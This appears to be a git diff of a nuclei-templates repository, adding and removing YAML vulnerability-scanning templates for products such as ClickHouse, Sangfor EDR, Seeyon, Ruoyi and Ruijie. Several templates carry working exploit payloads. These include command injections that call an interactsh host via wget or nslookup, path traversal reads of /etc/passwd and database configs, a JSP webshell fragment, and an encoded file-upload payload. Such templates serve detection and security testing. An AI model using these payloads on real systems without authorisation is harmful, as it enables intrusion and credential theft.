- - '{{BaseURL}}/tips/tipsLogin.action'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '
ClearPass Policy Manager - Aruba Networks'
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/clickhouse-unauth-1002.yaml b/nuclei-templates/Other/clickhouse-unauth-1002.yaml
new file mode 100644
index 0000000000..350b6f56d1
--- /dev/null
+++ b/nuclei-templates/Other/clickhouse-unauth-1002.yaml
@@ -0,0 +1,29 @@
+id: clickhouse-unauth
+
+info:
+ name: ClickHouse - Unauthorized Access
+ author: lu4nx
+ severity: high
+ description: ClickHouse was able to be accessed with no required authentication in place.
+ tags: network,clickhouse,unauth
+
+network:
+ - inputs:
+ # 0011436c69636b486f75736520636c69656e741508b1a9030007 is header
+ # 64656661756c74 = default
+ - data: 0011436c69636b486f75736520636c69656e741508b1a903000764656661756c7400
+ type: hex
+
+ host:
+ - "{{Hostname}}"
+ - "{{Host}}:9000"
+
+ read-size: 100
+ matchers:
+ - type: word
+ words:
+ - "ClickHouse"
+ - "UTC"
+ condition: and
+
+# Enhanced by mp on 2022/07/20
diff --git a/nuclei-templates/Other/clickhouse-unauth-1003.yaml b/nuclei-templates/Other/clickhouse-unauth-1003.yaml
deleted file mode 100644
index e13efcc614..0000000000
--- a/nuclei-templates/Other/clickhouse-unauth-1003.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: clickhouse-unauth
-info:
- name: Unauth ClickHouse Disclosure
- author: lu4nx
- severity: high
- tags: network,clickhouse,unauth
-network:
- - inputs:
- # 0011436c69636b486f75736520636c69656e741508b1a9030007 is header
- # 64656661756c74 = default
- - data: 0011436c69636b486f75736520636c69656e741508b1a903000764656661756c7400
- type: hex
- host:
- - "{{Hostname}}"
- - "{{Host}}:9000"
- read-size: 100
- matchers:
- - type: word
- words:
- - "ClickHouse"
diff --git a/nuclei-templates/Other/clientaccesspolicy-1005.yaml b/nuclei-templates/Other/clientaccesspolicy-1005.yaml
deleted file mode 100644
index e76a8e6d1d..0000000000
--- a/nuclei-templates/Other/clientaccesspolicy-1005.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: clientaccesspolicy
-
-info:
- author: emadshanab
- name: Silverlight cross-domain policy
- severity: info
- tags: misc
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/clientaccesspolicy.xml"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "
"
- - ""
- - "domain uri="
- condition: and
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/nuclei-templates/Other/clientaccesspolicy-1007.yaml b/nuclei-templates/Other/clientaccesspolicy-1007.yaml
new file mode 100644
index 0000000000..55ef4dcde4
--- /dev/null
+++ b/nuclei-templates/Other/clientaccesspolicy-1007.yaml
@@ -0,0 +1,25 @@
+id: clientaccesspolicy
+
+info:
+ name: Silverlight cross-domain policy
+ author: emadshanab
+ severity: info
+ tags: misc
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/clientaccesspolicy.xml"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ - ""
+ - "domain uri="
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/nuclei-templates/Other/clockwatch-enterprise-rce-1009.yaml b/nuclei-templates/Other/clockwatch-enterprise-rce-1009.yaml
new file mode 100644
index 0000000000..627d9fb6cc
--- /dev/null
+++ b/nuclei-templates/Other/clockwatch-enterprise-rce-1009.yaml
@@ -0,0 +1,22 @@
+id: clockwatch-enterprise-rce
+info:
+ name: ClockWatch Enterprise RCE
+ author: gy741
+ severity: critical
+ tags: clockwatch,rce,network
+ reference: https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html
+network:
+ - inputs:
+ - data: "C+nslookup {{interactsh-url}}"
+ host:
+ - "{{Hostname}}"
+ - "{{Hostname}}:1001"
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
+ - type: word
+ words:
+ - "OK-C"
diff --git a/nuclei-templates/Other/clockwatch-enterprise-rce-1010.yaml b/nuclei-templates/Other/clockwatch-enterprise-rce-1010.yaml
deleted file mode 100644
index 2586099ddb..0000000000
--- a/nuclei-templates/Other/clockwatch-enterprise-rce-1010.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: clockwatch-enterprise-rce
-info:
- name: ClockWatch Enterprise - Remote Code Execution
- author: gy741
- severity: critical
- description: |
- ClockWatch Enterprise is susceptible to remote code execution.
- reference:
- - https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
- cwe-id: CWE-77
- tags: clockwatch,rce,network
-network:
- - inputs:
- - data: "C+nslookup {{interactsh-url}}"
- host:
- - "{{Hostname}}"
- - "{{Host}}:1001"
- matchers-condition: and
- matchers:
- - type: word
- part: interactsh_protocol
- words:
- - "dns"
- - type: word
- words:
- - "OK-C"
-
-# Enhanced by mp on 2022/05/27
diff --git a/nuclei-templates/Other/clockwork-php-page-1016.yaml b/nuclei-templates/Other/clockwork-php-page-1016.yaml
new file mode 100644
index 0000000000..a8537a2f36
--- /dev/null
+++ b/nuclei-templates/Other/clockwork-php-page-1016.yaml
@@ -0,0 +1,25 @@
+id: clockwork-php-page
+
+info:
+ name: Clockwork PHP page exposure
+ author: organiccrap
+ severity: high
+ reference: https://twitter.com/damian_89_/status/1250721398747791360
+ tags: tech,clockwork
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/__clockwork/app'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - Clockwork
+ -
+ part: body
+ condition: or
diff --git a/nuclei-templates/Other/clockwork-php-page.yaml b/nuclei-templates/Other/clockwork-php-page.yaml
deleted file mode 100644
index 2fd8e70c0d..0000000000
--- a/nuclei-templates/Other/clockwork-php-page.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: clockwork-php-page
-info:
- name: Clockwork PHP page exposure
- author: organiccrap
- severity: high
- reference: https://twitter.com/damian_89_/status/1250721398747791360
- tags: tech,clockwork
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/__clockwork/app'
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - Clockwork
- -
- part: body
- condition: or
diff --git a/nuclei-templates/Other/cloudflare-image-ssrf-1023.yaml b/nuclei-templates/Other/cloudflare-image-ssrf-1023.yaml
new file mode 100644
index 0000000000..2674cd7f60
--- /dev/null
+++ b/nuclei-templates/Other/cloudflare-image-ssrf-1023.yaml
@@ -0,0 +1,22 @@
+id: cloudflare-external-image-resize
+
+info:
+ name: Cloudflare External Image Resizing Misconfiguration
+ author: vavkamil
+ severity: info
+ description: Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin.
+ reference: https://support.cloudflare.com/hc/en-us/articles/360028146432-Understanding-Cloudflare-Image-Resizing#12345684
+ tags: cloudflare,misconfig,oast
+
+requests:
+ - raw:
+ - |
+ GET /cdn-cgi/image/width/https://{{interactsh-url}} HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
diff --git a/nuclei-templates/Other/cloudflare-image-ssrf.yaml b/nuclei-templates/Other/cloudflare-image-ssrf.yaml
deleted file mode 100644
index 53750448b2..0000000000
--- a/nuclei-templates/Other/cloudflare-image-ssrf.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: cloudflare-external-image-resize
-
-info:
- name: Cloudflare External Image Resizing Misconfiguration
- author: vavkamil
- severity: info
- description: Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin.
- reference: https://support.cloudflare.com/hc/en-us/articles/360028146432-Understanding-Cloudflare-Image-Resizing#12345684
- tags: cloudflare,misconfig,oob
-
-requests:
- - raw:
- - |
- GET /cdn-cgi/image/width/https://{{interactsh-url}} HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
- Connection: close
- Accept: */*
- Accept-Language: en
-
- matchers:
- - type: word
- part: interactsh_protocol
- words:
- - "http"
diff --git a/nuclei-templates/Other/cloudinary-1026.yaml b/nuclei-templates/Other/cloudinary-1026.yaml
new file mode 100644
index 0000000000..0823117195
--- /dev/null
+++ b/nuclei-templates/Other/cloudinary-1026.yaml
@@ -0,0 +1,16 @@
+id: cloudinary-basic-auth
+
+info:
+ name: Cloudinary Basic Auth
+ author: gaurang
+ severity: high
+ tags: token,file,cloudinary
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ regex:
+ - "cloudinary://[0-9]{15}:[0-9A-Za-z\\-_]+@[0-9A-Za-z\\-_]+"
diff --git a/nuclei-templates/Other/cloudinary.yaml b/nuclei-templates/Other/cloudinary.yaml
deleted file mode 100644
index e424e6e447..0000000000
--- a/nuclei-templates/Other/cloudinary.yaml
+++ /dev/null
@@ -1,13 +0,0 @@
-id: cloudinary-basic-auth
-info:
- name: Cloudinary Basic Auth
- author: gaurang
- severity: high
- tags: token,file,cloudinary
-file:
- - extensions:
- - all
- extractors:
- - type: regex
- regex:
- - "cloudinary://[0-9]{15}:[0-9A-Za-z\\-_]+@[0-9A-Za-z\\-_]+"
diff --git a/nuclei-templates/Other/cloudphysician-radar-1028.yaml b/nuclei-templates/Other/cloudphysician-radar.yaml
similarity index 100%
rename from nuclei-templates/Other/cloudphysician-radar-1028.yaml
rename to nuclei-templates/Other/cloudphysician-radar.yaml
diff --git a/nuclei-templates/Other/cname-service-detection-1031.yaml b/nuclei-templates/Other/cname-service-detection-1031.yaml
deleted file mode 100644
index 4a441a0b4d..0000000000
--- a/nuclei-templates/Other/cname-service-detection-1031.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: cname-service-detection
-
-info:
- name: CNAME Service Detection
- author: pdteam
- severity: info
- description: A CNAME service was detected.
- reference:
- - https://ns1.com/resources/cname
- classification:
- cwe-id: CWE-200
- tags: dns,service
-
-dns:
- - name: "{{FQDN}}"
- type: CNAME
-
- matchers-condition: or
- matchers:
- - type: word
- name: zendesk
- words:
- - "zendesk.com"
-
- - type: word
- name: github
- words:
- - "github.io"
-
- - type: word
- name: announcekit
- words:
- - "cname.announcekit.app"
-
- - type: word
- name: wix
- words:
- - "wixdns.net"
-
-# Enhanced by mp on 2022/03/13
diff --git a/nuclei-templates/Other/cname-service-detection.yaml b/nuclei-templates/Other/cname-service-detection.yaml
new file mode 100644
index 0000000000..3724ef21c0
--- /dev/null
+++ b/nuclei-templates/Other/cname-service-detection.yaml
@@ -0,0 +1,33 @@
+id: cname-service-detection
+
+info:
+ name: cname service detection
+ author: pdteam
+ severity: info
+ tags: dns,service
+
+dns:
+ - name: "{{FQDN}}"
+ type: CNAME
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ name: zendesk
+ words:
+ - "zendesk.com"
+
+ - type: word
+ name: github
+ words:
+ - "github.io"
+
+ - type: word
+ name: announcekit
+ words:
+ - "cname.announcekit.app"
+
+ - type: word
+ name: wix
+ words:
+ - "wixdns.net"
diff --git a/nuclei-templates/Other/cname-service-detector.yaml b/nuclei-templates/Other/cname-service-detector-1033.yaml
similarity index 100%
rename from nuclei-templates/Other/cname-service-detector.yaml
rename to nuclei-templates/Other/cname-service-detector-1033.yaml
diff --git a/nuclei-templates/Other/cnvd-2018-13393-1038.yaml b/nuclei-templates/Other/cnvd-2018-13393-1038.yaml
index 14115a5565..5bb1f2b0cd 100644
--- a/nuclei-templates/Other/cnvd-2018-13393-1038.yaml
+++ b/nuclei-templates/Other/cnvd-2018-13393-1038.yaml
@@ -1,15 +1,9 @@
id: CNVD-2018-13393
info:
- name: Metinfo - Local File Inclusion
+ name: Metinfo LFI
author: ritikchaddha
severity: high
- description: Metinfo is susceptible to local file inclusion.
- reference:
- - https://paper.seebug.org/676/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
- cvss-score: 8.6
- cwe-id: CWE-22
+ reference: https://paper.seebug.org/676/
tags: metinfo,cnvd,cvnd2018,lfi
requests:
- method: GET
@@ -25,5 +19,3 @@ requests:
- "<%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("" +excuteCmd(request.getParameter("{{randstr}}")) + "
");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
- - |
- GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
- Host: {{Hostname}}
- req-condition: true
- matchers:
- - type: dsl
- dsl:
- - 'status_code_2 == 200'
- - 'contains(body_1, "htmoffice operate")'
- - 'contains(body_2, "Windows IP")'
- condition: and
-
-# Enhanced by mp on 2022/05/12
diff --git a/nuclei-templates/Other/CNVD-2019-32204.yaml b/nuclei-templates/Other/cnvd-2019-32204-1053.yaml
similarity index 100%
rename from nuclei-templates/Other/CNVD-2019-32204.yaml
rename to nuclei-templates/Other/cnvd-2019-32204-1053.yaml
diff --git a/nuclei-templates/Other/cnvd-2020-23735-1055.yaml b/nuclei-templates/Other/cnvd-2020-23735-1055.yaml
new file mode 100644
index 0000000000..f29654bf68
--- /dev/null
+++ b/nuclei-templates/Other/cnvd-2020-23735-1055.yaml
@@ -0,0 +1,30 @@
+id: CNVD-2020-23735
+info:
+ name: Xxunchi CMS - Local File Inclusion
+ author: princechaddha
+ severity: medium
+ description: Xunyou CMS is vulnerable to local file inclusion. Attackers can use vulnerabilities to obtain sensitive information.
+ reference:
+ - https://www.cnvd.org.cn/flaw/show/2025171
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cwe-id: CWE-22
+ tags: xunchi,lfi,cnvd,cnvd2020
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: body
+ words:
+ - "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
+ - "display_errors"
+ condition: and
+
+# Enhanced by mp on 2022/07/22
diff --git a/nuclei-templates/Other/cnvd-2020-46552.yaml b/nuclei-templates/Other/cnvd-2020-46552.yaml
new file mode 100644
index 0000000000..4fbc8f5847
--- /dev/null
+++ b/nuclei-templates/Other/cnvd-2020-46552.yaml
@@ -0,0 +1,34 @@
+id: CNVD-2020-46552
+
+info:
+ name: Sangfor EDR - Remote Code Execution
+ author: ritikchaddha
+ severity: critical
+ description: Sangfor Endpoint Monitoring and Response Platform (EDR) contains a remote code execution vulnerability. An attacker could exploit this vulnerability by constructing an HTTP request which could execute arbitrary commands on the target host.
+ reference:
+ - https://www.modb.pro/db/144475
+ - https://blog.csdn.net/bigblue00/article/details/108434009
+ - https://cn-sec.com/archives/721509.html
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cwe-id: CWE-77
+ metadata:
+ max-request: 1
+ tags: cnvd,cnvd2020,sangfor,rce
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body, "$show_input = function($info)")'
+ - 'contains(body, "$strip_slashes($host)")'
+ - 'contains(body, "Log Helper")'
+ - 'status_code == 200'
+ condition: and
+
+# digest: 4a0a0047304502202862eba6aef622b1dae0bcb4e023f3454a7d9bafa253edded09bef38bbf64713022100e4f0118515d3ce26dfb977df1e3bb9a11401d1b113b5842311bcadea68b213bc:922c64590222798bb761d5b6d8e72950
diff --git a/nuclei-templates/Other/cnvd-2020-56167-1064.yaml b/nuclei-templates/Other/cnvd-2020-56167-1062.yaml
similarity index 100%
rename from nuclei-templates/Other/cnvd-2020-56167-1064.yaml
rename to nuclei-templates/Other/cnvd-2020-56167-1062.yaml
diff --git a/nuclei-templates/Other/cnvd-2020-62422-1069.yaml b/nuclei-templates/Other/cnvd-2020-62422-1069.yaml
deleted file mode 100644
index fa167d7607..0000000000
--- a/nuclei-templates/Other/cnvd-2020-62422-1069.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: CNVD-2020-62422
-info:
- name: Seeyon readfile(CNVD-2020-62422)
- author: pikpikcu
- severity: medium
- reference: https://blog.csdn.net/m0_46257936/article/details/113150699
- tags: lfi,cnvd,cnvd2020,seeyon
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- part: header
- words:
- - "application/x-msdownload"
- condition: and
- - type: word
- part: body
- words:
- - "ctpDataSource.password"
- condition: and
diff --git a/nuclei-templates/Other/cnvd-2020-68596-1075.yaml b/nuclei-templates/Other/cnvd-2020-68596-1075.yaml
deleted file mode 100644
index 99bc639007..0000000000
--- a/nuclei-templates/Other/cnvd-2020-68596-1075.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: CNVD-2020-68596
-info:
- name: WeiPHP 5.0 Path Traversal
- author: pikpikcu
- severity: critical
- reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
- tags: weiphp,lfi,cnvd,cnvd2020
-requests:
- - raw:
- - |
- POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- "1":1
- - |
- GET /public/index.php/home/file/user_pics HTTP/1.1
- Host: {{Hostname}}
- - |
- GET {{endpoint}} HTTP/1.1
- Host: {{Hostname}}
- extractors:
- - type: regex
- name: endpoint
- part: body
- internal: true
- regex:
- - '/public/uploads/picture/(.*.jpg)'
- matchers:
- - type: word
- part: body
- words:
- - https://weiphp.cn
- - WeiPHP
- - DB_PREFIX
- condition: and
diff --git a/nuclei-templates/Other/cnvd-2021-01627.yaml b/nuclei-templates/Other/cnvd-2021-01627.yaml
deleted file mode 100644
index 1c1e24b8fc..0000000000
--- a/nuclei-templates/Other/cnvd-2021-01627.yaml
+++ /dev/null
@@ -1,47 +0,0 @@
-id: CNVD-2021-01627
-
-info:
- name: Zhiyuan OA Arbitrary File Upload
- author: daffainfo
- severity: critical
- reference: http://disk.scan.cm/zlsec/zlsec_info/document/wiki/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20ajax.do%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%20CNVD-2021-01627.md?hash=zE0KEPGJ
- tags: zhiyuan,rce,cnvd,cnvd2021
-
-requests:
- - raw:
- - |
- POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
- Host: {{Hostname}}
- Connection: close
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- Sec-Fetch-Site: none
- Sec-Fetch-Mode: navigate
- Sec-Fetch-User: ?1
- Sec-Fetch-Dest: document
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-CN,zh;q=0.9
- loginPageURL=; login_locale=zh_CN;
- Content-Type: application/x-www-form-urlencoded
-
- managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%0AuTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28%2A%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%C2%9D%C2%9D%C2%87%C3%B6%C2%A8%1F%C2%A6I%C3%99y%C3%B8%09%C3%8B%C3%9C%5DH%03%0F%C3%A3%C3%9A%C2%87%C2%9D%C2%98%C3%9C%C3%80%2C%C2%A9%5Cn%C3%8CJ%C3%8B+sE%C3%A1%C2%B6%25%C2%B5%C2%8CE%C3%8ERe%C3%81%2C.%C3%96%5C%12%402%C3%8F%01%C2%AF%C3%A7k%C2%A2%14%C2%AE6%C2%96%C2%8F%C2%83%C2%97%C3%A2%28.%22%5B%C2%93%7CH%C3%B4%0Ap%C2%B8pC%16m%C2%B4a%25%C2%85%C3%83g%27R%C2%AE%5B%C2%A2%26%C2%80%C3%A8%21%141gk%C3%82%C3%952+%C2%96D%C2%9C%01q%5C%C3%81%1A%C2%9F%2C8K%13%06%C3%B4%3D%5D%C2%A38mx%C3%93%C3%8F-%7E%25%C2%80%C2%A5Z%7C%2A%C2%A3%C2%B8%C2%B6%C2%B1%C3%89e%24%15%C2%BB%C2%B0%C3%BC%07%C3%B0%2F%C3%9FlQ%0F%5DqQY%C2%A6%C2%9A%C2%B8%C3%9C%C3%B0Q%12%C2%95%C3%942%C2%95%C2%9B%C2%B48%C3%BA%C2%B6%19%C2%B0%C2%B6%21%C2%9CA5%C2%99Q%C2%9D%1B%60%C3%8B%C3%822T%0C%C2%A2L%C2%97%C3%A7%C2%AD%C3%9EA%1C%07%14%C2%A3%C2%92%C3%84M%C3%A2%C3%B1%C3%8A%00PZ%C2%A6%C3%B4%C2%96%1F%5C%C2%A1%C2%B1J%1Dc%C3%A3%C3%AF%C2%B92%00%C3%BC%C3%86%C2%B7%C2%AB%00y%C2%A6%C2%8A%C2%A5E%06-%C2%84G4%3E%16%C2%9A%C2%AB%5CZ%C2%B6vk%C2%A2b%C2%9B%C3%A0%C3%9C%3E%C2%B6%C3%98%C2%B2%28%C2%A5%C2%9Bi%C2%89%C3%96%C2%A4%C3%84.%C2%81%C2%AC3%3D%C2%8FN%26%C3%BBLsZ%C3%A7%C3%BDl%1B%C2%B5%C3%9E%2A%C2%A09%C2%A0%C3%B9%C2%BB%C3%A7-RB%40%C3%B0%15%C2%8A%25%C2%863%C3%A1%00%C2%97%C2%AB%C3%84%25%C3%80wn%2C%C2%B2%0F%C3%BB%C2%81%7D%C3%98T%5B%C3%83%C3%86V%C2%A8%C2%9F%C2%B7%07i%60%21i%048%C3%BD%C3%96%C3%94%00%09Wh%C2%AA%C2%86e%C2%94%03%5B%C3%B3%11%C3%94%C2%A4%C3%94%C2%A9%C3%8E%C2%A3%3D%C2%87%C2%AFN%1B%C3%A3%C3%B8%C2%8D%5E%13%C2%88%C3%A1%1C%C3%93%C2%BA%C2%AA%C2%81K%14%2COW%13U%C3%9F+%C3%B9%C2%90%C2%85k%1A%C2%83c%C3%AE%C3%A3%0D%2As%C3%9B%04%C3%BE%C2%91%C3%93%C3%83%3AV%C2%8D%C3%93%C2%85%23%3F%C3%81V%C3%A5%C3%87%1F%C3%BE%C2%8C%C3%AC_%C3%BFL%C3%A4JB%C2%B2%C3%96%C3%88%C2%A7u%C2%BE%40%C3%A5%27%C3%AB7%7C%C3%AD%3Cr%C2%89%C3%8E%C3%93%C3%BA%C3%84P%0C%12P5zm%7Dj%C2%BD%C3%86%C2%AF_k%23O%C3%8FT%0Eb%C2%AB%12%C3%8E.k%C3%93%7C%2CRY%140%C2%AC%267h%0Cs%C3%97%C3%807%C3%BA6%C3%9D%C3%AB%C3%8AB%09%C3%959%C3%8Dkq%C2%B7%C3%8B%C2%9B%C3%BE%C3%A0T%C2%BC%C2%8Ftb%C3%93%5E%C2%95%C2%97%2B%0CL%1D%03%7E%C2%9F%C3%9B%C2%9C%C3%8E%1E%C2%89%C3%BE%C3%B6G%0Ej%C2%9AN%C2%ADK%C2%8E1%C3%B53%C2%A11%C3%90%C3%B8%C3%A1%C3%8A%C2%8D%14%C3%962%C2%84%C2%90%C3%86G%C3%BD%C3%90Kh%2CRP%05MO%C3%AF%C2%B9q%0EE%7D%08imw%C3%93q%C3%93%C2%93%C2%80S%2A%C3%87%C2%9C%C2%B0%C2%AE%C2%A8%C2%B3%C2%BB%C3%B0Z%C2%B4u%5D%15.%C2%BF%7F%7C%C2%9Fr%26%C3%8D%C2%A3%3EA%29%C3%A8O%5E%C2%B4%C3%B9%C2%B7%C3%A1%C3%8C%031%C2%A4%C2%83%0E%C3%AFw%3B%C3%A3%C2%9F%2B%C3%B5%C3%BE%3B%C3%95%C2%AD%C3%99%C2%9Dim%5B%C2%A6w%07%C3%AC%C2%B7%C3%B7%24%3F%C2%9D%28%40%C2%B3%04%1E%C2%BEt%C2%8E%C2%87%C3%85%C3%97%C3%A7%C2%8FK%C3%A2%C3%A3%C2%9E%C3%A97%0C%C2%8Ez%1F%C3%81%C3%BFO%17%C3%A08%C3%B5%C2%A8c%3F%C2%BE%C3%97%7B%C2%90%12%C3%90%3B1i%C3%A6d%080eY%C3%B6%1E%5E%C2%BB%3F%C3%A8r%C2%A4%0B%C3%B2%C2%B5%C2%BE%C2%B3K%C3%AEu%C3%BF%C3%BE%17%1CR%C2%AD%17W%05%00%00
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - '"message":null'
- - '"details":null'
- - '"code"'
- condition: and
-
- - type: word
- part: header
- words:
- - 'application/json'
-
- - type: status
- status:
- - 500
diff --git a/nuclei-templates/Other/cnvd-2021-01931-1078.yaml b/nuclei-templates/Other/cnvd-2021-01931-1078.yaml
new file mode 100644
index 0000000000..24df1d1252
--- /dev/null
+++ b/nuclei-templates/Other/cnvd-2021-01931-1078.yaml
@@ -0,0 +1,25 @@
+id: CNVD-2021-01931
+info:
+ name: Ruoyi Management System Arbitrary File Download
+ author: daffainfo,ritikchaddha
+ severity: high
+ reference: https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ
+ tags: ruoyi,lfi,cnvd,cnvd2021
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd"
+ - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini"
+ matchers-condition: or
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0"
+ - type: word
+ part: body
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
diff --git a/nuclei-templates/Other/cnvd-2021-09650-1081.yaml b/nuclei-templates/Other/cnvd-2021-09650-1081.yaml
deleted file mode 100644
index 96c4ff58fd..0000000000
--- a/nuclei-templates/Other/cnvd-2021-09650-1081.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: CNVD-2021-09650
-
-info:
- name: Ruijie EWEB Gateway Platform Command Execution
- author: daffainfo
- severity: critical
- reference: http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
- tags: ruijie,cnvd,cnvd2021,rce
-
-requests:
- - raw:
- - |
- POST /guest_auth/guestIsUp.php
- Host: {{Hostname}}
-
- mac=1&ip=127.0.0.1|wget {{interactsh-url}}
-
- unsafe: true
- matchers:
- - type: word
- part: interactsh_protocol
- name: http
- words:
- - "http"
